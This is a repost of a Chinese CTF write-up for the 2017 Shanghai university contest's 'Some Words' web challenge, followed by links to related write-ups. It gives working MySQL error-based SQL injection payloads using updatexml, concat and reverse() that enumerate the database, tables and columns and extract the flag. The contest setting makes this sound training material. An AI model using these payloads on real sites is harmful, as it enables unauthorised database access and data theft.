第三届上海市大学生网络安全大赛2017全国邀请赛some words题解

最新推荐文章于 2023-12-17 18:36:21 发布

weixin_30827565

最新推荐文章于 2023-12-17 18:36:21 发布

阅读量476

点赞数

文章标签：数据库 php

原文链接：http://www.cnblogs.com/ryuuku/p/7783982.html

版权

发现有错误回显，于是想到updatexml报错注入

http://ae67e27b918d4e49ad5c1cd6e8c6d4459137e5d215634ec1.game.ichunqiu.com/index.php?id=updatexml(1,concat(0x7e,(select database()),0x7e),1)

看到数据库words，在报错注入中还有一种简单的方式判断当前数据库即构造?id=a()

该句表示在words数据库中不存在a表，一次输入以下函数的到返回信息

user()          XPATH syntax error: '~root@localhost~'
database()     XPATH syntax error: '~words~'
version()         XPATH syntax error: '~5.5.57-0ubuntu0.14.04.1~'
@@datadir    XPATH syntax error: '~/var/lib/mysql/~'

接下来查表数目
?id=updatexml(1,concat(0x7e,(select count(*) from information_schema.tables ),0x7e),1)            #查询数据库中有多少表

找到表f14g

?id=updatexml(1,concat(0x7e,(select table_name from information_schema.tables limit 81,1),0x7e),1)

查表的数目

?id=updatexml(1,concat(0x7e,(select count(*) from information_schema.columns ),0x7e),1)

找到fl4g字段

?id=updatexml(1,concat(0x7e,(select column_name from information_schema.columns limit 808,1),0x7e),1)

读字段找flag

?id=updatexml(1,concat(0x7e,(select f14g from f14g),0x7e),1)

我感觉此题最经典的地方在于flag不完全显示出来，要用到sql语句的另一个函数reverse()

?id=updatexml(1,concat(reverse((select f14g from f14g))),1)

所以最后flag为flag{aedc780c-21f9-472a-9ae6-235fc568086c}

转载于:https://www.cnblogs.com/ryuuku/p/7783982.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_30827565

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

第三届上海市大学生网络安全大赛WebWP题目Some Words

u011250160的博客

10-26

798

主页 http://20dea9f5b3da4db1bb7fe3472e9d6096d924f1e154ab4473.changame.ichunqiu.com/index.php 我的消息 http://20dea9f5b3da4db1bb7fe3472e9d6096d924f1e154ab4473.changame.ichunqiu.com/index.php?id=1 试探sql注入 http://20dea9f5b3da4db1bb7fe3472e9d6096d924f1e154ab4473.cha

17上海市网络安全大赛wp【web】

Sp4rkW的博客

11-06

1354

Some words 脚本测试为limit 81的时候可以试出f14g，，尝试出，字段名也是f14g 继续这个爆破，脚本放下面出flag Welcome To My Blog 通过awvs发现home.php 猜测测试出passage.php和album.php 猜测action是文件读取，尝试，flag 查看源码出 ...

参与评论您还未登录，请先登录后发表或查看评论

some words from website

04-16

737

The most beautiful thing in life is maths, even your last day on earth will be counted. Attention, it makes you feel important for only 1 second. If you don’t think you’re stupid, you’re not smart e

Some Words

weixin_33881041的博客

10-02

1. 辛辛苦苦过轻松日子，轻轻松松过辛苦日子。2. 先有原则，再工作；而不是先工作，再找原则3. 永远不说不，不想做的就说可以做，需要xxxxxxx的人力和物力。4. 你真诚地自我肯定，你更有雅量肯定别人。5. 一般不做自我辩护，但可以澄清一些观念、一些选择、一些是非。6. 不要把过去的事全让人知道。7. 话多必失，人多的场合少说话。8. 人际关系的天敌是“猜测”，破解密码是“真诚”！9. 不急...

第三届上海市大学生网络安全大赛流量分析

wobushilijiatu的博客

12-17

663

一个挺好玩的流量分析的题

第二届全国大学生算法设计与编程挑战赛(春季赛赛题).rar

06-09

【标题】：第二届全国大学生算法设计与编程挑战赛(春季赛赛题) 本次比赛是针对全国大学生的一场算法设计与编程竞赛，旨在提升参赛者的算法思维和编程能力。春季赛作为赛事的一部分，通常会吸引众多热爱编程的学子...

第45届ICPC国际大学生程序设计竞赛亚洲区域赛（沈阳站）题目题解

04-06

本资源为第45届ICPC国际大学生程序设计竞赛亚洲区域赛（沈阳站）题目题解，比赛时长一共五小时，题目为全英文题目，并且在比赛的时候可以使用一切纸质书籍，但禁止使用电子产品，一组三个队员，只允许使用一台电脑，...

中国科学技术大学第八届信息安全大赛的官方与非官方题解源码+项目说明.zip

01-30

【资源说明】 1、该资源包括项目的全部源码，下载可以直接使用！ 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和...中国科学技术大学第八届信息安全大赛的官方与非官方题解源码+项目说明.zip

中国科学技术大学第七届信息安全大赛的官方与非官方题解源码+项目说明.zip

01-30

【资源说明】 1、该资源包括项目的全部源码，下载可以直接使用！ 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和...中国科学技术大学第七届信息安全大赛的官方与非官方题解源码+项目说明.zip

中国科学技术大学第十届信息安全大赛的官方与非官方题解源码+项目说明.zip

最新发布

01-30

【资源说明】 1、该资源包括项目的全部源码，下载可以直接使用！ 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和...中国科学技术大学第十届信息安全大赛的官方与非官方题解源码+项目说明.zip

第三届上海大学生网络安全赛（线上赛）-MS1战队-Writeup

01-20

ctf write up 第三届上海大学生网络安全赛（线上赛）-MS1战队

CTF省赛练习笔记（1）流量分析WP

JaySRJ7的博客

10-06

4022

** CTF省赛练习笔记MISC—流量分析篇 ** 一、第三届上海市网络安全大赛流量分析——traffic 1.下载附件用wireshark打开 2.一开始搜索字符串flag没有发现什么有价值的东西，接下来想到筛选一些流量进行分析，在筛选ftp-data时发现有几条流量都含有flag.zip，想到将他们导出分组字节流。 3.经过分析后发现可以导出的是一个key.log和两个压缩包（key.l...

第三届上海市大学生网络安全大赛流量分析 traffic WriteUp

mutou990的博客

08-27

1442

参考1：https://www.cnblogs.com/sn1per/p/11835479.html 参考2：https://blog.csdn.net/JaySRJ7/article/details/102215248 题目链接： https://pan.baidu.com/s/1Utfq8W-NS4AfI0xG-HqSbA 提取码: 9wqs 解题思路：打开流量包后，按照协议进行分类，发现了存在以下几种协议类型： ARP / DNS / FTP / FTP-DATA / ICMP / ICMPv6

第三届上海市大学生网络安全大赛------classical

weixin_44110537的博客

08-01

312

decrypt 1,词频分析接着解密： LyjtL3fvnSRlo2xvKIjrK2ximSHkJ3ZhJ2Hto3x9 import base64 s='LyjtL3fvnSRlo2xvKIjrK2ximSHkJ3ZhJ2Hto3x9' import pycipher import copy for i in range(26): c='' for j in range(len(s)): if s[j].isalpha(): if s[j].i

第三届上海大学生网络安全大赛流量分析

Assassin

11-06

3645

比赛时候的一道misc题目，睡觉去了没做，现在看一看感觉还是有一些意思的，决定还是补一补题目，首先打开Wireshake查看文件流，发现很多走的都是TLSv1协议，这个是加密的，暂时没什么办法解决。然后一个个分析tcp流发现了存在FTP流发现了一些可能有用的东西，然后我们分别在这里tcp流下得到内容其中flag.zip两个 tcp.stream eq 38 tcp.stream eq 44 其中

[BJDCTF2020]RSA

rang的博客

12-08

1606

题目给了c和e、同公钥（e，n）加密的密文、具有同q的公钥加密的密文思路：由同q的公钥，也就是n公用了素数q，通过gcd函数可以得到p，也就有p和q 此时就差e就能解出题目，已知e的范围、相同公钥加密的密文可由_294c == pow(294,e,n)爆破e，脚本如下： import gmpy2 from Crypto.Util.number import * # flag=open("flag","rb").read() # p=getPrime(1024) # q=getPrime(1024) #

第三届上海市大学生网络安全大赛 i春秋CTF Web解题思路

曹振国的博客

05-01

1190

SOME WORDS1.发现SQL注入2.尝试SQLMap3.经实验发现过滤了"="和"and"reverse()函数flag总结 1.发现SQL注入 ?id=1 有数据 ?id=2 有数据 ?id=2-1 有数据 2.尝试SQLMap 发现报错： 3.经实验发现过滤了"=“和"and” 发现页面会返回错误信息，尝试报错注入：用到函数:updatexml updatexml(目标xml内容，xml文档路径，更新的内容) 查询库名 ?id=updatexml(1,concat(0x7e,

第三届上海市大学生网络安全大赛crackme

xuedingyue的博客

11-29

624

PEID查壳北斗3.7版本的壳，单步或者esp定律法脱壳最好不要用od自带的插件脱壳，我用od自带的插件脱壳后在ida32位中无法加载。 ida载入，f5看出加密算法数据所在位置脚本得出flag...

第三届全国大学生算法挑战赛：二分法解题策略解析

"第三届全国大学生算法设计与编程挑战赛的相关题解" 在第三届全国大学生算法设计与编程挑战赛中，涉及到的题目主要集中在算法设计和实现上。以下是针对题目B和D的详细解析。 B题是一个关于二分查找的算法问题。...